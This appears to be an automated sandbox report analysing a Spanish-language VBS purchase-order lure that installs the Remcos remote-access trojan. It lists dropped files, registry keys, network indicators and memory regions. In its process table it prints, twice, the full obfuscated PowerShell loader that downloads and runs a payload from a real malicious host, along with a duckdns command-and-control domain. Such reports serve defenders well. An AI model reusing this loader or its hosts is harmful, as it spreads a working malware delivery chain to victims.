Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
nOrden_de_Compra___0001245.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_302qice3.01n.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hypfsfn3.qtz.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuen13te.5on.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3qauho0.q5l.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Trkfugl.Chr
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs"
|
|
|
|
C:\Windows\System32\wbem\WMIC.exe
|
wmic diskdrive get caption,serialnumber
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus
#>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If
($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne
-lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function
Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness
'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru
dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe
ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0
0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness
'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU
';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous
(Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd
Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$
PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness
$underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR
Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous
($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR
g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas
dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness
',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM
PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP
tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB
Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G (
.tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs
OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS
LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous
(Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI
HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m
.a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous
(Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D
siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness
' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS
oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous
$Multibirth;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus
#>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If
($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne
-lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function
Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness
'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru
dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe
ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0
0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness
'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU
';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous
(Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd
Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$
PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness
$underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR
Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous
($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR
g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas
dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness
',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM
PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP
tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB
Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G (
.tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs
OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS
LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous
(Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI
HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m
.a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous
(Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D
siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness
' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS
oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous
$Multibirth;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin
|
200.6.118.162
|
||
|
https://torresvmackenna.cl
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://torresvmackenna.cl
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.binb
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://torresvmackenna.cl/bin/Interplea.snp
|
200.6.118.162
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://torresvmackenna.cl/bin/iNJULFUvfUQqzNBELgyUIZY67.bin1
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://torresvmackenna.cl/bin/Interplea.snpP
|
unknown
|
||
|
https://torresvmackenna.cl/bin/Interplea.snpXR#l
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
fumecexpsales1international.duckdns.org
|
185.236.203.101
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
torresvmackenna.cl
|
200.6.118.162
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.236.203.101
|
fumecexpsales1international.duckdns.org
|
Romania
|
|
|
|
200.6.118.162
|
torresvmackenna.cl
|
Chile
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T15VJD
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T15VJD
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-T15VJD
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
2316F000
|
stack
|
page read and write
|
|
|
|
BB20000
|
direct allocation
|
page execute and read and write
|
|
|
|
75D000
|
heap
|
page read and write
|
|
|
|
789000
|
heap
|
page read and write
|
|
|
|
1A2DAD9F000
|
trusted library allocation
|
page read and write
|
|
|
|
8AA0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5D5C000
|
trusted library allocation
|
page read and write
|
|
|
|
755E000
|
stack
|
page read and write
|
||
|
1C1F2A8E000
|
heap
|
page read and write
|
||
|
1C1F288A000
|
heap
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1FB2F8F2000
|
heap
|
page read and write
|
||
|
1A2E31A0000
|
heap
|
page read and write
|
||
|
1C1F293F000
|
heap
|
page read and write
|
||
|
1FB2F986000
|
heap
|
page read and write
|
||
|
1A2E3307000
|
heap
|
page read and write
|
||
|
1FB2DAF9000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D95F000
|
heap
|
page read and write
|
||
|
1C1F46C4000
|
heap
|
page read and write
|
||
|
1C1F2828000
|
heap
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
8390000
|
heap
|
page read and write
|
||
|
1FB2F9E8000
|
heap
|
page read and write
|
||
|
1FB2FAB0000
|
heap
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
A720000
|
direct allocation
|
page execute and read and write
|
||
|
1A2CB1B4000
|
trusted library allocation
|
page read and write
|
||
|
1C1F287D000
|
heap
|
page read and write
|
||
|
1FB2D937000
|
heap
|
page read and write
|
||
|
8460000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C1F2949000
|
heap
|
page read and write
|
||
|
1FB2F800000
|
heap
|
page read and write
|
||
|
78BD000
|
stack
|
page read and write
|
||
|
1A2E3355000
|
heap
|
page read and write
|
||
|
870E000
|
stack
|
page read and write
|
||
|
78F0000
|
trusted library allocation
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
22D3F000
|
stack
|
page read and write
|
||
|
1FB2FA30000
|
heap
|
page read and write
|
||
|
1C1F46C4000
|
heap
|
page read and write
|
||
|
1C1F46BD000
|
heap
|
page read and write
|
||
|
1C1F28AE000
|
heap
|
page read and write
|
||
|
1FB2F9A9000
|
heap
|
page read and write
|
||
|
2FD4B67000
|
stack
|
page read and write
|
||
|
1FB2D991000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2892000
|
heap
|
page read and write
|
||
|
2305F000
|
stack
|
page read and write
|
||
|
6970000
|
remote allocation
|
page execute and read and write
|
||
|
230EC000
|
stack
|
page read and write
|
||
|
1A2CAB90000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
6D5000
|
heap
|
page read and write
|
||
|
22F3E000
|
stack
|
page read and write
|
||
|
7615000
|
heap
|
page read and write
|
||
|
8620000
|
trusted library allocation
|
page read and write
|
||
|
1C1F2A2E000
|
heap
|
page read and write
|
||
|
1FB2D8A0000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
4AE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
4D06000
|
trusted library allocation
|
page read and write
|
||
|
2ED7000
|
heap
|
page read and write
|
||
|
1C1F2A8B000
|
heap
|
page read and write
|
||
|
71CA000
|
stack
|
page read and write
|
||
|
1FB2D924000
|
heap
|
page read and write
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
1A2DAD40000
|
trusted library allocation
|
page read and write
|
||
|
877C000
|
heap
|
page read and write
|
||
|
E2395FC000
|
stack
|
page read and write
|
||
|
1FB2F94E000
|
heap
|
page read and write
|
||
|
8AC0000
|
direct allocation
|
page read and write
|
||
|
31310FE000
|
stack
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2DAB0000
|
heap
|
page read and write
|
||
|
313123F000
|
stack
|
page read and write
|
||
|
1FB2F914000
|
heap
|
page read and write
|
||
|
31B2000
|
trusted library allocation
|
page read and write
|
||
|
78E000
|
heap
|
page read and write
|
||
|
7110000
|
direct allocation
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1C1F2895000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
739E000
|
stack
|
page read and write
|
||
|
1FB2DAF8000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1C1F2A8D000
|
heap
|
page read and write
|
||
|
70F0000
|
direct allocation
|
page read and write
|
||
|
782000
|
heap
|
page read and write
|
||
|
1FB2F7F0000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1A2E3280000
|
heap
|
page execute and read and write
|
||
|
1FB2F420000
|
remote allocation
|
page read and write
|
||
|
8778000
|
heap
|
page read and write
|
||
|
1A2DB028000
|
trusted library allocation
|
page read and write
|
||
|
3230000
|
heap
|
page readonly
|
||
|
1FB2F9E8000
|
heap
|
page read and write
|
||
|
3184000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
1FB2F933000
|
heap
|
page read and write
|
||
|
1C1F2A22000
|
heap
|
page read and write
|
||
|
866C000
|
stack
|
page read and write
|
||
|
1A2C90AB000
|
heap
|
page read and write
|
||
|
1FB2F9B5000
|
heap
|
page read and write
|
||
|
4C09000
|
trusted library allocation
|
page read and write
|
||
|
1C1F289B000
|
heap
|
page read and write
|
||
|
1FB2D8CA000
|
heap
|
page read and write
|
||
|
1FB2F914000
|
heap
|
page read and write
|
||
|
230AD000
|
stack
|
page read and write
|
||
|
1FB2F963000
|
heap
|
page read and write
|
||
|
1FB2F95F000
|
heap
|
page read and write
|
||
|
1FB2F983000
|
heap
|
page read and write
|
||
|
1FB2D8E7000
|
heap
|
page read and write
|
||
|
1C1F2880000
|
heap
|
page read and write
|
||
|
1C1F28B3000
|
heap
|
page read and write
|
||
|
1A2CC9A1000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F953000
|
heap
|
page read and write
|
||
|
6FB0000
|
heap
|
page execute and read and write
|
||
|
1C1F2820000
|
heap
|
page read and write
|
||
|
E2391FE000
|
stack
|
page read and write
|
||
|
874E000
|
stack
|
page read and write
|
||
|
1C1F2790000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F973000
|
heap
|
page read and write
|
||
|
1FB2F9A6000
|
heap
|
page read and write
|
||
|
70E0000
|
direct allocation
|
page read and write
|
||
|
1FB2F97A000
|
heap
|
page read and write
|
||
|
1C1F2A24000
|
heap
|
page read and write
|
||
|
1A2CCA81000
|
trusted library allocation
|
page read and write
|
||
|
9140000
|
direct allocation
|
page execute and read and write
|
||
|
1FB2F937000
|
heap
|
page read and write
|
||
|
1FB2F997000
|
heap
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
page read and write
|
||
|
76BB000
|
heap
|
page read and write
|
||
|
1A2CADB4000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F94E000
|
heap
|
page read and write
|
||
|
1FB2DA90000
|
heap
|
page read and write
|
||
|
7FF848E16000
|
trusted library allocation
|
page read and write
|
||
|
E2394FE000
|
stack
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page execute and read and write
|
||
|
84B0000
|
trusted library allocation
|
page read and write
|
||
|
3220000
|
heap
|
page execute and read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
1A2CB6EB000
|
trusted library allocation
|
page read and write
|
||
|
1C1F28AE000
|
heap
|
page read and write
|
||
|
1C1F2790000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9B5000
|
heap
|
page read and write
|
||
|
1C1F2858000
|
heap
|
page read and write
|
||
|
1C1F46B1000
|
heap
|
page read and write
|
||
|
A00000
|
direct allocation
|
page read and write
|
||
|
313107E000
|
stack
|
page read and write
|
||
|
1A2E3140000
|
heap
|
page read and write
|
||
|
22EAE000
|
stack
|
page read and write
|
||
|
31A0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2D99B000
|
heap
|
page read and write
|
||
|
22DFD000
|
stack
|
page read and write
|
||
|
1C1F28B3000
|
heap
|
page read and write
|
||
|
31311F8000
|
stack
|
page read and write
|
||
|
6C0000
|
heap
|
page read and write
|
||
|
84D0000
|
trusted library allocation
|
page read and write
|
||
|
22CA0000
|
heap
|
page read and write
|
||
|
6FFE000
|
stack
|
page read and write
|
||
|
4BB1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E46000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BD9000
|
trusted library allocation
|
page read and write
|
||
|
310B000
|
heap
|
page read and write
|
||
|
1FB2D98E000
|
heap
|
page read and write
|
||
|
75C0000
|
heap
|
page read and write
|
||
|
8AB0000
|
direct allocation
|
page read and write
|
||
|
1C1F289A000
|
heap
|
page read and write
|
||
|
3249000
|
heap
|
page read and write
|
||
|
1FB2D8DE000
|
heap
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
318D000
|
trusted library allocation
|
page execute and read and write
|
||
|
86AB000
|
stack
|
page read and write
|
||
|
22D7E000
|
stack
|
page read and write
|
||
|
1A2C90EF000
|
heap
|
page read and write
|
||
|
4B9E000
|
stack
|
page read and write
|
||
|
1FB2F914000
|
heap
|
page read and write
|
||
|
1FB2FABA000
|
heap
|
page read and write
|
||
|
1FB2D95C000
|
heap
|
page read and write
|
||
|
1C1F46B4000
|
heap
|
page read and write
|
||
|
7685000
|
heap
|
page read and write
|
||
|
1A2E3163000
|
heap
|
page read and write
|
||
|
1FB2F9C6000
|
heap
|
page read and write
|
||
|
1A2C9410000
|
heap
|
page readonly
|
||
|
1A2CB8C6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F11000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FB2F908000
|
heap
|
page read and write
|
||
|
22DBE000
|
stack
|
page read and write
|
||
|
1FB2F7F7000
|
heap
|
page read and write
|
||
|
1C1F2889000
|
heap
|
page read and write
|
||
|
84E0000
|
trusted library allocation
|
page read and write
|
||
|
1FB2F9A9000
|
heap
|
page read and write
|
||
|
1C1F2881000
|
heap
|
page read and write
|
||
|
1FB2F7FC000
|
heap
|
page read and write
|
||
|
6F2E000
|
stack
|
page read and write
|
||
|
1C1F46BD000
|
heap
|
page read and write
|
||
|
1FB2F983000
|
heap
|
page read and write
|
||
|
1FB2D92C000
|
heap
|
